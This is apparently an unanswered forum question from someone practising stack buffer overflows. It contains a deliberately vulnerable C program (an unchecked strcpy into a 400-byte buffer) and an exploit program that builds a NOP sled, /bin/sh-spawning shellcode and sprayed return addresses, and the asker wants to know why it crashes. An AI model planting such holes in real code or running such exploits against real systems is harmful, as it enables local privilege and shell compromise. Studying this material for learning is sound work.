2

I've been practicing some basic stack-based buffer overflow task recently and I wrote an vulnerable program like this:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc,char **argv)
{
        if (argc<2) {
                puts("Need enough args!!");
                exit(0);
        }

        char buf[400];
        strcpy(buf,argv[1]);
        printf("Hi, %s\n",buf);
        return 0;
}

and the exploit program like this:

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#define ATK_L 430
#define VUL_L 400
#define NOP_L 12

int main(){
    char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73"
                "\x68\x68\x2f\x62\x69\x6e\x89"
                "\xe3\x89\xc1\x89\xc2\xb0\x0b"
                "\xcd\x80\x31\xc0\x40\xcd\x80";

    char *atk,vul[]="./vul1 ";
    atk=(char*)malloc(sizeof(char)*ATK_L);
    unsigned long i,ret,*ptr,ptr2;

    ret=(unsigned long)atk;
    ptr=(unsigned long*)atk;

    for(i=0;i<ATK_L;i+=4){
        *(ptr++)=ret;
    }

    for(i=0;i<NOP_L;i++){
        atk[i]='\x90';
    }

    ptr2=0;
    for(i=NOP_L;i<NOP_L+strlen(shellcode);i++){
        atk[i]=shellcode[ptr2++];
    }
    atk[ATK_L-1]='\0';

    strcat(vul,atk);

    system(vul);

    free(atk);

    return 0;   
}

Since I don't want to determine the offset , I just jump back to the beginning of the atk array . I turn off the ASLR & put the -fno-stack-protector flag when compiling , but when I run the exploit program it just say core dump and do nothing!! I use gdb to debug the exploit program and it said that it was killed in the getenv function and I just cant get understand.

I work on ubuntu 11.10 32bits

Thanks a lot :-)

shockwave
  • 145
  • 1
  • 11

0 Answers0